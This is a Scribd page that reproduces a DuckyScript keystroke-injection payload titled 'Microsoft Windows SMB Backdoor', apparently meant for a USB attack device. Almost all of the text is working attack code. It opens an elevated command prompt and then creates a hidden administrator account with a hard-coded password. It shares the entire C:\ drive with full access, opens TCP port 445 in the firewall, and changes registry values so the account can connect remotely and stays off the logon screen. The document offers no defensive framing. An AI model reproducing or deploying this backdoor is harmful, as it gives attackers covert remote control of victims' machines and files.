Scribd
Upload
3 views2 pages

Payload

Uploaded by

9yhzmzdt84
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
3 views2 pages

Payload

Uploaded by

9yhzmzdt84
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 2

REM #

REM # Title: "Microsoft Windows" SMB Backdoor


REM #
REM # Description:
REM # 1) Adds a user account (OMG_User:OMG_P@ssW0rD).
REM # 2) Adds this local user to local administrator group.
REM # 3) Shares "C:\" directory (OMG_SHARE).
REM # 4) Adds a rule to the firewall.
REM # 5) Sets a value to "LocalAccountTokenFilterPolicy" to
access the "C:" with a local account.
REM # 6) Hides this user account.
REM #
REM # Author: TW-D
REM # Version: 1.0
REM # Category: Remote Access
REM # Target: Microsoft Windows
REM #
REM # TESTED ON
REM # ===============
REM # Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
REM # Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
REM #
REM # REQUIREMENTS
REM # ===============
REM # The target user must belong to the 'Administrators' group.
REM #

REM ######## INITIALIZATION ########

DELAY 1000
DUCKY_LANG US
DELAY 1000

REM ######## STAGE1 ########

GUI r
DELAY 3000
STRING cmd
DELAY 1000
CTRL SHIFT ENTER
DELAY 3000
LEFTARROW
DELAY 5000
ENTER
DELAY 5000

REM ######## STAGE2 ########

STRING NET USER OMG_User OMG_P@ssW0rD /ADD


ENTER
DELAY 1500

STRING NET LOCALGROUP Administrators OMG_User /ADD


ENTER
DELAY 1500

REM ######## STAGE3 ########

STRING NET SHARE OMG_SHARE=C:\ /GRANT:OMG_User,FULL /REMARK:"ORemote MGShare"


ENTER
DELAY 1500

STRING NETSH ADVFIREWALL FIREWALL ADD RULE NAME="Server Message Block for OMG"
PROTOCOL=TCP LOCALPORT=445 DIR=IN ACTION=ALLOW PROFILE=PUBLIC,PRIVATE,DOMAIN
ENTER
DELAY 1500

REM ######## STAGE4 ########

STRING REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\


Policies\System" /f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1
ENTER
DELAY 1500

STRING REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\


Winlogon\SpecialAccounts\UserList" /f /v OMG_User /t REG_DWORD /d 0
ENTER
DELAY 1500

REM ######## FINISH ########

STRING EXIT
ENTER

You might also like